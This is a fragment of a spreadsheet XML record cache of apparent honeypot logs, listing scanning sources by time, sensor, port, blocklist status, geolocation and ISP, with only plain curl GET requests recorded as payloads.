    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:2944"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3305"/>
    <x v="3305"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T15:15:02"/>
    <d v="2025-04-03T15:15:02"/>
    <d v="2025-04-03T15:15:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:5ddf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3306"/>
    <x v="3306"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T15:08:42"/>
    <d v="2025-04-03T15:08:42"/>
    <d v="2025-04-03T15:08:42"/>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3b5d:8d44"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3307"/>
    <x v="3307"/>
    <s v="125-228-115-91.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T15:05:58"/>
    <d v="2024-12-27T09:50:49"/>
    <d v="2025-04-03T15:05:58"/>
    <n v="372"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23&amp;&amp;80&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL: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7de4:735b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3308"/>
    <x v="3308"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:52:37"/>
    <d v="2025-04-03T14:27:40"/>
    <d v="2025-04-03T14:52:37"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:a46e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3309"/>
    <x v="3309"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:50:53"/>
    <d v="2025-04-03T14:50:53"/>
    <d v="2025-04-03T14:50:53"/>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3:d7f4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3310"/>
    <x v="3310"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:44:05"/>
    <d v="2024-11-28T11:25:36"/>
    <d v="2025-04-03T14:44:05"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445&amp;&amp;59275&amp;&amp;59268"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Chitradurga"/>
    <s v="Khandenahalli"/>
    <s v="10884578"/>
    <s v="577596"/>
    <s v="14.0373"/>
    <s v="76.8029"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Bharti Airtel Ltd"/>
    <s v="2010-02-17"/>
    <s v="XREC-4489106-CHITRADURGA"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (182.78.46.78,60988)}&amp;&amp;{Data_SMB:Incoming connection (182.78.46.78,57906)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b64e:2e4e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3311"/>
    <x v="3311"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:42:27"/>
    <d v="2025-03-28T06:45:56"/>
    <d v="2025-04-03T14:42:27"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="KU"/>
    <s v="Al Asimah"/>
    <s v="NA"/>
    <s v="Kuwait City (Jibla)"/>
    <s v="285787"/>
    <s v="NA"/>
    <s v="29.3716"/>
    <s v="47.9736"/>
    <s v="42961"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="cellular"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="2012-01-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2524:5725"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3312"/>
    <x v="3312"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:30:03"/>
    <d v="2025-04-03T14:30:03"/>
    <d v="2025-04-03T14:30:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b639:d4a7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3313"/>
    <x v="3313"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:28:54"/>
    <d v="2024-12-23T08:21:40"/>
    <d v="2025-04-03T14:28:54"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="69"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="27"/>
    <s v="Daegu"/>
    <s v="Suseong-gu"/>
    <s v="Beomeo-dong"/>
    <s v="8692109"/>
    <s v="NA"/>
    <s v="35.8578"/>
    <s v="128.631"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2005-08-23"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d89:5a2d"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3314"/>
    <x v="3314"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:24:07"/>
    <d v="2025-04-03T14:24:07"/>
    <d v="2025-04-03T14:24:07"/>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3b5d:8b9e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3315"/>
    <x v="3315"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:12:32"/>
    <d v="2025-04-03T14:10:43"/>
    <d v="2025-04-03T14:12:32"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Krishna"/>
    <s v="Kānūru"/>
    <s v="10778953"/>
    <s v="NA"/>
    <s v="16.4985"/>
    <s v="80.6914"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312b:e97c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3316"/>
    <x v="3316"/>
    <s v="125-229-240-71.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T14:07:53"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T14:07:53"/>
    <n v="486"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;14707&amp;&amp;80&amp;&amp;18109&amp;&amp;23&amp;&amp;9100&amp;&amp;4949&amp;&amp;57389&amp;&amp;56209&amp;&amp;63839&amp;&amp;51694&amp;&amp;51720&amp;&amp;51732&amp;&amp;51745&amp;&amp;51763"/>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NA&amp;&amp;GET&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:f047"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3317"/>
    <x v="3317"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:58:04"/>
    <d v="2025-04-03T13:51:21"/>
    <d v="2025-04-03T13:58:04"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MA"/>
    <s v="Massachusetts"/>
    <s v="Suffolk"/>
    <s v="Boston"/>
    <s v="4930956"/>
    <s v="02112"/>
    <s v="42.3601"/>
    <s v="-71.0589"/>
    <s v="203020"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="hosting"/>
    <s v="Hostroyale Technologies"/>
    <s v="2014-12-09"/>
    <s v="Hostroyale_Technologies"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2be1:bdb9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3318"/>
    <x v="3318"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:57:47"/>
    <d v="2024-12-27T03:48:36"/>
    <d v="2025-04-03T13:57:47"/>
    <n v="109"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="Melbourne"/>
    <s v="Melbourne"/>
    <s v="2158177"/>
    <s v="3001"/>
    <s v="-37.8136"/>
    <s v="144.963"/>
    <s v="1221"/>
    <s v="Telstra Limited"/>
    <s v="Telstra Limited"/>
    <s v="business"/>
    <s v="Telstra Corporation"/>
    <s v="2010-12-23"/>
    <s v="TELSTRAINTERNET50-AU"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:65b5:3bed"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3319"/>
    <x v="3319"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:47:20"/>
    <d v="2025-04-03T13:43:29"/>
    <d v="2025-04-03T13:47:20"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'spam'&amp;&amp; 'exploits']}"/>
    <n v="161"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="13"/>
    <s v="Quảng Ninh"/>
    <s v="Thành Phố Uông Bí"/>
    <s v="Thành Phố Uông Bí"/>
    <s v="1563241"/>
    <s v="NA"/>
    <s v="21.0343"/>
    <s v="106.77"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="xDSL Services"/>
    <s v="2005-10-25"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7deb:eb6e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3320"/>
    <x v="3320"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:41:33"/>
    <d v="2025-04-03T13:41:33"/>
    <d v="2025-04-03T13:41:33"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:37e7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3321"/>
    <x v="3321"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:38:42"/>
    <d v="2025-03-11T20:42:07"/>
    <d v="2025-04-03T13:38:42"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13725"/>
    <s v="101.693"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="residential"/>
    <s v="Adsl Streamyx"/>
